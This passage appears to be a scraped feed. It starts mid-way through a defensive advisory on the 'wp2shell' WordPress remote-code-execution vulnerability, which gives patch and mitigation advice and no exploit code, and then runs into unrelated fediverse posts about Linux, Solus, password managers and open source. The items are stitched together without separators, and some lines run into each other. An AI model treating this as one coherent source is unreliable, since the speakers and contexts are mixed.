Yes. The affected security issues are tracked as CVE-2026-63030 (REST API batch-route confusion leading to RCE) and CVE-2026-60137 (facilitated SQL injection).
How can I protect my WordPress site?
Update immediately to WordPress 7.0.2 or 6.9.5, verify your site version, and temporarily block access to the
/wp-json/batch/v1endpoint if immediate patching is not possible.Final Thoughts
wp2shell is one of the most significant WordPress core vulnerabilities disclosed in recent years. Its impact stems not only from the possibility of remote code execution, but also from how little an attacker needs to exploit it. A default installation with no plugins, no customizations, and no authentication can still be exposed if it remains unpatched.
The WordPress project’s decision to push emergency updates automatically underscores the seriousness of the issue. While researchers have intentionally withheld the complete exploit chain, history suggests that patch diffing and independent analysis will likely produce public exploit code in the near future.
For defenders, the window for proactive remediation is measured in days rather than weeks. Administrators should verify their WordPress version, confirm that security updates have been applied successfully, and review logs for suspicious requests targeting the REST Batch API. In situations like this, prompt patching remains the most effective defense.
aww yiss my linuxfest northwest talk has been uploaded!!! and unlike the livestream it isn't cut off at the beginning!!!!!
it's about the fediverse and what i've learned from being on here for nine years
Heya folks! It's sync day, and that means it's time for the weekly Solus roundup! Read all about it on our forums: https://discuss.getsol.us/d/12871-week-29-2026
#FOSS #Linux #Solus #OpenSource
- Evan
A lot of people are moving away from Big Tech. Many more would like to do so, but they do not know that it is really easy to do so and that there are good options.
You do, given that you are here. Maybe time to help your friends?
Some good options, that I use myself :
OS : Linux.
Browser : Vivaldi.
Mail client : Vivaldi.
Calendar client : Vivaldi.
Mail Service : Proton, FastMail.
Social : Mastodon & Fediverse in general.
Office package : Libre Office.
Video conference : Whereby.
Feel free to suggest more options and share with your friends!
#Linux #BigTech #Microsoft #Apple #Google #Alternative #EU #Europa #Vivaldi #Browser #Mail #Calendar #Technology
Heya, folks! We've pushed an update to our website with a redesign of the cards on our download page! The new design should make that page more beautiful and easier to use. Check it out: https://getsol.us/download/
- Evan
I’m a current @1password subscriber, but given my recent difficulties using the application with the #JAWS screen-reader, I thought I’d give @bitwarden another shot, but that experience was even worse, due to the number of unlabeled buttons contained within the computer application.
To that end, my question is:
What’s everyone’s favorite?#Accessible #Cross-platform #PasswordManager that works across #Apple, #Windows & #Linux, specifically #Slint?
Collabora announce a preview of Holo Core, an AArch64 port of Arch Linux for Steam Frame https://www.gamingonlinux.com/2026/07/collabora-announce-a-preview-of-holo-core-an-aarch64-port-of-arch-linux-for-steam-frame/
"Open source by definition keeps the door wide open, legally to boot. But a fork only gives you the code. An open source project is more than its code, it's the sum of its maintainers, infrastructure, trademarks, dependencies, and trust. You can copy the code in seconds, the rest you would need to rebuild from scratch in most cases. The people invoking the right to fork already know this."
https://tarakiyee.com/fork-it-or-walk-away/
H/T @jbz
Review of an interesting Gameboy-ish music player that is well worth reading if you are interested in such things. I might be tempted to back this / buy one for myself and my kids.
What's "funny" about this is that it has a magnetic backer that is intended to clip to your smartphone.
Like, you know, the all-in-one devices that were *supposed* to obsolete standalone media players. The all-in-one devices that, frankly, suck as music players - especially if you run Linux and just want to copy MP3s, etc., over to a device without having to fuss with cloud services or whatever.
#MP3 #Music #MediaPlayer #Linux
https://gardinerbryant.com/hands-on-with-the-hidizs-ap30-music-boy/
[$] Securing BPF LSMs against tampering
Since 2020, BPF programs have been able to act as Linux security modules (LSMs). Several projects, including systemd, have been working to use that capability to provide more secu [...]
https://lwn.net/Articles/1082111/ #LWN #Linux #kernel #Gentoo #systemd #BPF #LSFMMBPF
This week's #Linux and #OpenSource News video is a bit early this week, as I won't be available tomorrow (another #Warhammer tournament!).
In this one, we have Torvalds talking about A.I. in two different ways, and also talking about the "social" aspect of Open Source, we have Wayland beating x11 in gaming benchmarks, and Age Verification growing quietly in a lot of countries:
Having seen some technologies come to a definite end, Chris wonders if we should be willing to draw a line under open source software sometimes.